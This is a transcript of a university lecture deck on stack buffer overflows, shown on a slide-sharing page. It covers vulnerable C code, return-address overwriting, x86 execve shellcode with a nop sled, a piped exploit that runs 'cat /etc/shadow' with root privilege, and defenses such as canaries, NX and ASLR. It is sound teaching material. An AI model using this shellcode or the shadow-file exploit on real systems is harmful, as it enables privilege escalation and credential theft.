Buffer Overflow CS461/ECE422 Spring 2012. Reading Material Based on Chapter 11 of the text.

Slides:



Advertisements
Similar presentations
Smashing the Stack for Fun and Profit
Advertisements

Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 11 – Buffer Overflow.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
Buffer Overflow. Process Memory Organization.
Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.
Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.
Lecture 16 Buffer Overflow
Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.
Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.
Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,
Mitigation of Buffer Overflow Attacks
Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 10 “Buffer Overflow”.
CSCD 303 Essential Computer Security Spring 2013 Lecture 17 Buffer Overflow Attacks.
Smashing the Stack Overview The Stack Region Buffer Overflow
CNIT 127: Exploit Development Ch 3: Shellcode. Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object.
Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.
Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,
Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Lecture 9: Buffer Ovefflows and ROP EEN 312: Processors: Hardware, Software, and Interfacing Department of Electrical and Computer Engineering Spring 2014,
CNIT 127: Exploit Development Ch 1: Before you begin.
Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium
What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.
A Tool for Pro-active Defense Against the Buffer Overrun Attack D. Bruschi, E. Rosti, R. Banfi Presented By: Warshavsky Alex.
Introduction to Information Security ROP – Recitation 5.
Buffer overflow and stack smashing attacks Principles of application software security.
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
Slides by Kent Seamons and Tim van der Horst Last Updated: Nov 11, 2011.
VM: Chapter 7 Buffer Overflows. csci5233 computer security & integrity (VM: Ch. 7) 2 Outline Impact of buffer overflows What is a buffer overflow? Types.
Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.
Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade Crispin Cowan SANS 2000.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.
Chapter 10 Buffer Overflow 1. A very common attack mechanism o First used by the Morris Worm in 1988 Still of major concern o Legacy of buggy code in.
1 Introduction to Information Security , Spring 2016 Lecture 2: Control Hijacking (2/2) Avishai Wool.
Introduction to Information Security
Let’s look at an example
Buffer Overflow By Collin Donaldson.
Mitigation against Buffer Overflow Attacks
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
The Hardware/Software Interface CSE351 Winter 2013
Introduction to Information Security
CSC 495/583 Topics of Software Security Stack Overflows (2)
CMSC 414 Computer and Network Security Lecture 21
Software Security.
Buffer Overflow.
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
Software Security Lesson Introduction
Lecture 9: Buffer Overflow*
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.
CNT4704: Analysis of Computer Communication Network Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Fall 2011.
Week 2: Buffer Overflow Part 2.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.
Understanding and Preventing Buffer Overflow Attacks in Unix
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.
System and Cyber Security
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2010.
Format String Vulnerability
Return-to-libc Attacks
Presentation transcript:

Buffer Overflow CS461/ECE422 Spring 2012

Reading Material Based on Chapter 11 of the text

Outline Buffer Overflow Stack Buffer Overflow Shell Code Defenses

Buffer Overflow “A condition at interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information.” Used for exploitation – Crash – Get control

Example 1.#include 2.#include 3.int main(int argc, char *argv[]) { 4.int valid = 0; 5.char str1[8] = "ASECRET"; 6.char str2[8]; 7.gets(str2); 8.if (strncmp(str1, str2, 8)==0) 9.valid = 1; 10.printf("VALID=%d", valid); 11.return 0; 12.}

Example $./a.out ASECRET VALID=1 $./a.out HELLO VALID=0 $./a.out OVERFLOWOVERFLOW VALID=1 Why?

Example argv argc return address old base pointer valid str1[4-7] str1[0-3] str2[4-7] str2[0-3] FLOW OVER FLOW OVER 0x argv argc return address old base pointer valid str1[4-7] str1[0-3] str2[4-7] str2[0-3] T... ASECRE... 0x After gets(str2) str2=“OVERFLOWOVERFLOW” Before gets(str2)

Stack Structure Review buf[0-255] saved frame pointer return address function args (char* c) previous frames stack pointer frame pointer mem addresses high low void foo(char* c) { char buf[256]; strcpy(buf, c); }

Stack Buffer Overflow Also called Stack smashing Overflow when targeted buffer is located on stack, as a local variable in stack frame of a function Overwrite return address/frame pointer or pointer to address of attack code in memory Example in next slide – Overwrite saved return address (RA) – E.g., overwrite saved RA with same RA of function to re-execute it.

Example 1.#include 2.#include 3.void prompt(char * tag) { 4. char inp[16]; 5. printf(“Enter value for %s: “, tag); 6. gets(inp); 7. printf(“Hello your %s is %s\n”, tag, inp); 8.} 9.int main(int argc, char *argv[]) { 10. prompt(“name”); 11.}

Example Run debugger, prompt() at 0x inp located 24 bytes under current frame ptr – Pad the string by this amount (e.g. 24 A ’s) Choose a nearby stack location ( 0xbfffffe8 ) to overwrite current frame register Overwrite return address with 0x Combine this data together into binary string perl –e ‘print pack(“H*”, hex string);’

Example tag return address old base pointer inp[12-15] inp[8-11] inp[4-7] inp[0-3] AAAA tag return address old base pointer inp[12-15] inp[8-11] inp[4-7] inp[0-3]... After gets(..) callBefore gets(..) call f e8fbffbf e8ffffbf $ perl –e ' print pack(“H*”, hex string); ' |./a.out Enter value for name: Hello your Re?pyy]uEA is AAAAAAAAAAAAAAAAAAAAAAAuyu Enter value for Kyyu: Hello your Kyyu is NNNN Segmentation fault prompt(..) is called twice! * Little endian

Stack Buffer Overflow What if we want to do something more interesting than calling prompt (..) twice? Can set the return address to point to custom code held within the stack frame (shellcode).

Shellcode Want to transfer execution of program to code stored in the buffer we overflow. Why “shell” code? Launch a shell. – Run any program – With privilege of exploited program

Shellcode int main(int argc, char * argv[]) { char *sh; char *args[2]; sh=“/bin/sh”; args[0] = sh; args[1] = NULL; execve(sh, args, NULL); } nop jmpfind cont:pop%esi xor%eax, %eax mov%al, 0x7*%esi) lea(%esi), %ebx mov %esi,0x8(%esi) mov%eax,0xc(%esi) mov$0xb, %al mov%esi, %ebx lea0x8(%esi),%ecx lea0xc(%esi),%edx int$0x80 find:call cont sh:.string “/bin/sh “ args:.long 0.long eb 1a 5e 31 c d 1e 89 5e c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80 e8 e1 ff ff ff 2f e 2f To x86 assembly To hex value for compiled x86 code nop sled Launches Bourne shell ( sh ) on Intel Linux system Payload

Shellcode Target program with elevated privileges and vulnerable buffer – E.g., start with similar program to previous inp example and say it is owned by root. Let’s say we want to be able to read /etc/shadow, which needs superuser privilege, but we only have a non-root account.

Shellcode buffer saved frame pointer return address args previous frame NOP shellcode payload Address a previous frame 0xbffffbc0 0xbffffc08 perl –e ‘print pack(“H*”, hex string); print “cat /etc/shadow\n”;’ |./a.out 88 bytes Before gets(..) call After gets(..) call

Shellcode Before, our user cannot access /etc/shadow This exploit code will open /bin/sh and display the contents of /etc/shadow by sending the shell the cat command using root privilege

Shellcode As normal user As superuser

Shellcode Some notes about shellcode: – Shellcode usually comes from sites like Metasploit project.Metasploit project – Cannot use bytes with NULL value. Can use xor %eax, %eax command to obtain 0 value – Shellcode is mostly used to allow shell commands to execute other commands and send back data to attacker.

Return to System Call Non-executable stack defense – Cannot execute code held in stack Make code call library function through a set of memory location manipulations RA changed to jump to existing system library function, e.g. system(“shell command line”) in order to launch shell commands. Defend by randomizing stack and system libraries

Defenses Compile-Time – Programming Language Choice – Extensions / Safe Libraries – Stack Protection Run-Time – Executable Address Space Protection – Address Space Randomization

Compile-Time Programming Language Choice – High-level (e.g. Java) Strongly typed variables Operations permitted – Not as vulnerable Range checking – Downside, resource use

Compile-Time Extensions / Safe Libraries – Replace standard library routines (e.g. C strings) with safer versions Rewrite source with new calls (like strlcpy(..) ) Replace whole library (like libsafe), provides protection without recompilation – Puts additional checks to stop some buffer overflow attacks

Compile-Time Stack Protection – Check stack frame corruption – StackGuard Canary value Included in newer gcc – Return Address Defender Copy return address (RA) Safe location

Run-Time Executable Address Space Protection – Block execution of code on stack – No-execute bit – Assume executable code held elsewhere – Standard in newer O.S.’s (Vista+, Linux) and 64-bit processors

Run-Time Address Space Randomization – Stack buffer overflow: need to predict address of buffer in memory (decide what is proper RA value) – Change address stack location random per process – Address range is large (32 bit), provides much variation. Larger than most vulnerable buffers. – Therefore NOP-sled will not work (cannot get it large enough to handle large range.)

Summary Buffer overflow is a serious threat to systems. It is possible to disrupt system and perform unauthorized actions using stack buffer overflow attacks. Shellcode can be used to modify execution of a vulnerable program. There exist compile- and run-time protections against these attacks.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.